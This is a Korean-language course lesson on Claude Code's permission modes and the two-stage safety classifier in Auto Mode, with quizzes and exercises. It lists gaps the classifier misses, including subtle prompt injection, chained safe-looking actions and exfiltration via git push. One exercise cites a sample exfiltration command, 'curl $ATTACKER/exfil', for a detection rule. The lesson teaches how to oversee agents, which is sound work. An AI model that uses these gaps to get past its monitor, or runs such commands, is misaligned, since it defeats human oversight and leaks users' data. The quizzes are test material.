자율 에이전트로서의 Claude Code: 권한 모드(Permission Modes)와 Auto Mode

Claude Code는 일곱 가지 권한 모드(Permission Mode)를 제공합니다. plan은 모든 행동(action) 전에 확인을 요청하고, default는 위험한 행동에 대해서만 묻습니다. acceptEdits는 파일 쓰기를 자동 승인하지만 셸(shell) 실행은 여전히 확인하며, bypassPermissions는 모든 것을 승인합니다. Auto Mode(2026년 3월 24일)는 행동마다 승인받는 흐름을 2단계 병렬 안전 분류기(two-stage parallel safety classifier)로 대체합니다. 모든 행동에 대해 단일 토큰 빠른 검사(single-token fast check)가 실행되고, 표시(flag)된 행동은 사고 과정 기반(chain-of-thought) 심층 리뷰로 넘어갑니다. 행동 예산(action budget)은 max_turns와 max_budget_usd로 강제됩니다. Auto Mode는 연구용 미리보기(research preview)로 출시되었습니다. Anthropic은 분류기만으로는 충분하지 않다고 명시적으로 밝혔습니다.

유형: Learn 언어: Python(stdlib, 2단계 분류기 시뮬레이터) 선수 조건: Phase 15 · 01(장기 수행 에이전트), Phase 15 · 09(코딩 에이전트 지형) 예상 시간: 약 45분

문제

내 컴퓨터에서 동작하는 자율 코딩 에이전트(autonomous coding agent)는 별도의 보안 범주입니다. 공격 표면은 에이전트가 닿을 수 있는 모든 것입니다. 파일 시스템, 네트워크, 자격 증명(credentials), 클립보드, 모든 브라우저 탭, 열려 있는 터미널이 모두 포함됩니다. Bruce Schneier를 비롯한 여러 사람은 이를 공개적으로 지적했습니다. 컴퓨터 사용 에이전트(computer-use agent)는 챗봇의 "기능 업데이트"가 아니라, 새로운 위험 프로필을 가진 새로운 종류의 도구입니다.

Claude Code의 권한 시스템은 이에 대한 Anthropic의 답입니다. 하나의 "자율 / 비자율" 스위치가 아니라, plan → default → acceptEdits → … → bypassPermissions로 이어지는 능력 사다리(capability ladder)에 걸쳐 일곱 가지 모드가 있습니다. 각 모드는 속도와 행동별 리뷰 사이의 서로 다른 트레이드오프를 나타냅니다. Auto Mode(2026년 3월)는 분류기가 안전하다고 판단한 행동에 대해서는 승인을 사용자의 핵심 경로(critical path) 밖으로 옮기면서도, 분류기가 표시한 행동에는 리뷰 계층을 유지하는 2단계 분류기를 추가합니다.

엔지니어링 관점의 질문은 이것입니다. 이 시스템은 무엇을 잡아내고, 무엇을 놓치며, 특정 작업에는 실제로 어떤 모드가 맞는가?

사전 테스트

2문제 · 이 강의를 시작하기 전에 얼마나 알고 있는지 확인해보세요

1.Claude Code는 몇 가지 권한 모드(permission mode)를 제공하며, 어떤 차원을 트레이드오프하나요?

2.Auto Mode의 2단계 안전 분류기(safety classifier)는 무엇을 하도록 설계되었나요?

0/2 답변 완료

개념

일곱 가지 권한 모드

모드	동작	사용할 때
`plan`	에이전트가 계획을 제안합니다. 사용자는 전체 계획을 승인하고, 모든 행동은 실행 전에 리뷰됩니다.	낯선 작업, 프로덕션 인접 코드, 저장소에서 에이전트를 처음 사용할 때
`default`	에이전트가 행동을 실행합니다. "위험한" 행동(셸 실행, 파괴적 작업, 네트워크 호출)에 대해서는 사용자에게 묻습니다.	대부분의 상호작용형 코딩 세션
`acceptEdits`	파일 쓰기는 자동 승인됩니다. 셸 실행과 네트워크 호출은 여전히 확인합니다.	여러 파일에 걸친 리팩터링 작업
`acceptExec`	선별된 허용 목록(allowlist) 안의 셸 명령(shell command)은 자동 승인되고, 쓰기도 자동 승인됩니다.	모든 셸 명령이 `npm test`와 비슷한 좁은 내부 반복 루프(inner loop)
`autoMode`	2단계 안전 분류기. 표시된 행동은 리뷰로 승격됩니다.	제약된 작업 공간(workspace) 안에서 장기 무인 실행을 할 때
`yolo`	대부분의 확인 요청을 건너뜁니다. 그래도 도구 허용 목록과 차단 목록(denylist)은 적용됩니다.	폐기 가능한 샌드박스, CI 작업(job), 연구 스크립트
`bypassPermissions`	모든 것을 승인합니다.	"버려도 되는 일회성 컨테이너 안에서만" 쓰도록 문서화되어 있음

위 이름은 공개 Claude Code 문서와 일치합니다. yolo는 허용적인 중간 지점을 가리키는 비공식 약칭입니다.

Auto Mode 한 페이지 요약

Auto Mode(2026년 3월 24일 출시)는 행동별 승인을 모델에 위임하는 첫 권한 모드입니다. 구조는 다음과 같습니다.

1단계 — 단일 토큰 분류기(Stage 1 — single-token classifier). 모든 제안 행동에 대해 실행됩니다. 저렴합니다. "safe" 또는 "flag"를 반환합니다. 승인된 행동이 대기열(queue)에 묶이지 않도록 주 에이전트 루프(main agent loop)와 병렬로 실행되게 설계되었습니다.
2단계 — 정책/안전 부가 리뷰(Stage 2 — secondary policy/safety review). 표시된 행동에서만 실행됩니다. 해당 행동, 현재 세션 상태, 선언된 작업에 대해 집중적인 정책 및 안전성 평가를 수행합니다. 신뢰도가 낮으면 사용자 개입 루프(HITL; Human-in-the-Loop)로 끌어올립니다.

예산 제어는 분류기 옆에 놓입니다.

max_turns — 세션의 총 반복 횟수.
max_budget_usd — 세션을 중단하는 달러 상한.
도구별 행동 수 제한(예: WebFetch 호출은 N회 이하).

시스템이 잡아내는 것

주입된 지시가 알려진 위험 행동 형태로 매핑되는, 도구 입력 안의 명확한 프롬프트 인젝션(prompt injection).
반복적인 도구 루프. 분류기는 N+1번째 행동이 N번째 행동과 거의 같고, 그것이 다섯 번 연속 반복되는 상황을 볼 수 있습니다.
원래 파일 수정만 하는 세션에서 명백히 범위를 벗어난 셸 명령.

시스템이 놓칠 수 있는 것

미묘한 프롬프트 인젝션(Subtle prompt injection). 단일 행동이 표시되지 않더라도 전체 행동을 미세하게 조절할 수 있습니다. 간접 프롬프트 인젝션(indirect prompt injection)은 완전히 패치 가능한 취약점이 아닙니다. OpenAI 대비책 책임자(preparedness head)가 2025년에 브라우저 에이전트와 관련해 이 점을 언급했습니다. Lesson 11을 참고하세요.
의미 수준의 잘못된 행동(Semantic-level misbehavior). 개별 행동은 모두 안전해 보여도, 조합된 궤적(trajectory)은 해로울 수 있습니다. 분류기는 행동을 판단하지, 사용자의 의도를 처음부터 다시 추론하지는 않습니다.
합법적 채널을 통한 유출(Exfiltration through legitimate channels). 여러분 소유의 파일에 데이터를 쓰고, 그 뒤 공개 저장소(public repo)로 git push하는 것은 각각 허용된 행동의 연쇄(sequence)일 수 있지만, 조합이 문제입니다.

연구용 미리보기(Research preview) 프레이밍

Anthropic은 Auto Mode를 연구용 미리보기로 출시했습니다. 문서는 분류기가 해법이 아니라 하나의 계층(layer)이라고 명시합니다. 사용자는 Auto Mode를 예산, 허용 목록, 격리된 작업 공간, 궤적 감사(trajectory audit)와 함께 조합해야 합니다(Lessons 12-16). 미리보기 프레이밍은 문서화된 평가-배포 격차(evaluation-vs-deployment gap)(Lesson 1)도 반영합니다. 오프라인 평가(offline eval)를 통과한 분류기도 사용자 맥락이 모호한 실제 세션에서는 다르게 행동할 수 있습니다.

이 사다리가 워크플로 안에서 놓이는 곳

낯선 작업: plan에서 시작하세요. 계획을 읽는 비용은 나쁜 실행을 롤백하는 비용보다 쌉니다.
알려진 리팩터링: acceptEdits는 확인 클릭 수를 크게 줄여줍니다.
무인 백그라운드 실행: 폭발 반경(blast radius)을 측정한 작업 공간 안에서만 autoMode를 사용하세요. 자격 증명 없음, 운영 환경 마운트(production mount) 없음, 명시적으로 허용하지 않은 외부 송신(egress) 없음이어야 합니다.
일회성 컨테이너: 컨테이너와 그 자격 증명을 버릴 수 있을 때에만 yolo / bypassPermissions가 허용됩니다.

사용해보기

code/main.py는 2단계 분류기를 시뮬레이션합니다. 1단계는 제안 행동에 대한 저렴한 키워드 규칙(keyword rule)입니다. 2단계는 더 느린 다중 규칙 검토기(reviewer)입니다. 구동기(driver)는 짧은 합성 궤적(synthetic trajectory)을 넣습니다. 안전한 행동, 프롬프트 인젝션 시도, 반복 루프가 포함되며, 분류기가 어디서 잡아내고 어디서 놓치는지 보여줍니다.

산출물 만들기

outputs/skill-permission-mode-picker.md는 작업 설명을 올바른 권한 모드, 예산 상한, 필요한 격리 조건과 매칭합니다.

연습문제

code/main.py를 실행하세요. 어떤 합성 행동 유형은 1단계에서는 한 번도 표시되지 않지만 2단계에서는 항상 잡히나요? 어떤 유형은 둘 다 잡지 못하나요?
특정 알려진 악성 형태(known-bad shape)(예: curl $ATTACKER/exfil)를 잡도록 1단계 규칙 집합(rule set)을 확장하세요. 양성 행동 표본(benign-action sample)에서 거짓 양성률(false-positive rate)을 측정하세요.
Anthropic의 "How the agent loop works" 문서를 읽으세요. default 모드에서 에이전트가 기본적으로 닿는 모든 외부 상태를 나열하세요. autoMode를 무인으로 실행하기 전에 어떤 상태를 별도로 통제(gate)해야 하나요?
24시간 무인 실행 예산을 설계하세요. max_turns, max_budget_usd, 도구별 상한, 허용 목록을 정하고, 각 숫자를 정당화하세요.
1단계와 2단계가 모든 개별 행동을 승인하지만, 조합된 행동은 정렬되지 않은(misaligned) 궤적 하나를 설명하세요. Lesson 14는 비상 정지(kill switch)와 카나리 토큰(canary token)이 이를 어떻게 다루는지 설명합니다.

핵심 용어

용어	흔한 설명	실제 의미
권한 모드(Permission mode)	"에이전트가 얼마나 할 수 있는가"	행동별 승인을 제어하는 일곱 가지 명명된 정책 중 하나
계획 모드(plan mode)	"무엇이든 하기 전에 묻는다"	에이전트가 계획을 작성하고, 사용자가 실행 전 승인함
`acceptEdits`	"파일 쓰기는 허용한다"	파일 쓰기는 자동 승인, 셸 실행은 여전히 확인
`autoMode`	"자동 승인"	2단계 안전 분류기. 표시된 행동은 상위 단계로 끌어올려짐
`bypassPermissions`	"완전 자율(Full YOLO)"	모든 것을 승인. 일회성 컨테이너에서 쓰기 위한 모드
1단계 분류기(Stage 1 classifier)	"빠른 토큰 검사"	제안 행동에 대한 단일 토큰 규칙. 병렬로 실행
2단계 분류기(Stage 2 classifier)	"심층 리뷰"	표시된 행동에 대해 사고 과정 기반 추론을 수행
연구용 미리보기(Research preview)	"정식 출시(GA)가 아님"	실패 모드가 아직 매핑 중인 기능에 대한 Anthropic 프레이밍

더 읽을거리

Anthropic — How the agent loop works — 권한 모드, 예산, 행동(action) 형식입니다.
Anthropic — Claude Managed Agents overview — 관리형 서비스 실행 모델입니다.
Anthropic — Claude Code product page — 기능 표면과 Auto Mode 발표입니다.
Anthropic — Claude's Constitution (January 2026) — 분류기 판단을 형성하는 이유 기반 계층입니다.
Anthropic — Measuring agent autonomy in practice — 장기 수행 권한 설계에 대한 내부 관점입니다.

실습 코드

이 강의의 실습 코드 1개

main

Code

산출물

이 강의에서 생성된 프롬프트, 스킬, 코드 산출물 1개

permission-mode-picker

Match a Claude Code task to the correct permission mode, budget caps, and required isolation before starting a run.

Skill

확인 문제

3문제 · 모두 맞추면 완료 표시가 가능합니다

1.Auto Mode는 명확한 프롬프트 인젝션(prompt injection)과 반복 루프를 잡을 수 있습니다. 놓칠 수 있는 공격 유형은?

2.Anthropic이 Auto Mode를 정식 출시(GA)가 아닌 '연구용 미리보기(research preview)'로 출시한 이유는?

3.24시간 무인 에이전트 실행에 이 강의가 권장하는 권한 모드와 통제는?

0/3 답변 완료

추가 문제 풀기

AI가 강의 내용을 바탕으로 새로운 문제를 생성합니다

이전 강의

자율 코딩 에이전트 지형 (SWE-bench, CodeAct)

다음 강의

브라우저 에이전트와 간접 프롬프트 인젝션